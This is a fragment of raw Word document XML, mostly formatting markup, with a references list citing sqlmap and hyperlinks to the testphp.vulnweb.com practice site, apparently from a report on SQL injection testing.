          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004A6ACA" w:rsidRDefault="004A6ACA" w:rsidP="004A6ACA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="120"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004A6ACA" w:rsidRDefault="004A6ACA" w:rsidP="004A6ACA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="120"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004A6ACA" w:rsidRDefault="004A6ACA" w:rsidP="004A6ACA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="120"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004A6ACA" w:rsidRDefault="004A6ACA" w:rsidP="004A6ACA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="120"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004A6ACA" w:rsidRDefault="004A6ACA" w:rsidP="004A6ACA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="120"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="003C3A31">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003C3A31" w:rsidRDefault="003C3A31" w:rsidP="003C3A31">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3A31" w:rsidRPr="00614041" w:rsidRDefault="00614041" w:rsidP="003C3A31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00614041">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>https://sqlmap.org/</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="00614041">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00614041">
        <w:t>https://www.kali.org/tools/sqlmap/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="00614041">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00614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927A4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CFEC0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7E395A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="066804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7940730"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F9EA3BCC"/>
    <w:lvl w:ilvl="0" w:tplc="0DBE92C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F62327"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7DEAE976"/>
    <w:lvl w:ilvl="0" w:tplc="0DBE92C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E162CC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0D9A5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A31"/>
    <w:rsid w:val="003C3A31"/>
    <w:rsid w:val="004A6ACA"/>
    <w:rsid w:val="004B4921"/>
    <w:rsid w:val="00614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AEE1F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A1540D11-8D4B-4863-AD9E-6F7391567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041"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="003C3A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A31"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="003C3A3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C3A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6A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php.vulnweb.com/artists.php?artist=1"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testphp.vulnweb.com/artists.php?artist=1"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testphp.vulnweb.com/artists.php?artist=1" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/artists.php?artist=1" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/artists.php?artist=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testphp.vulnweb.com/artists.php?artis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2022-10-21T13:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-21T14:52:00Z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1dc7e225-85c1-41f2-a9b2-652cb0d010da</vt:lpwstr>
  </property>
</Properties>
</file>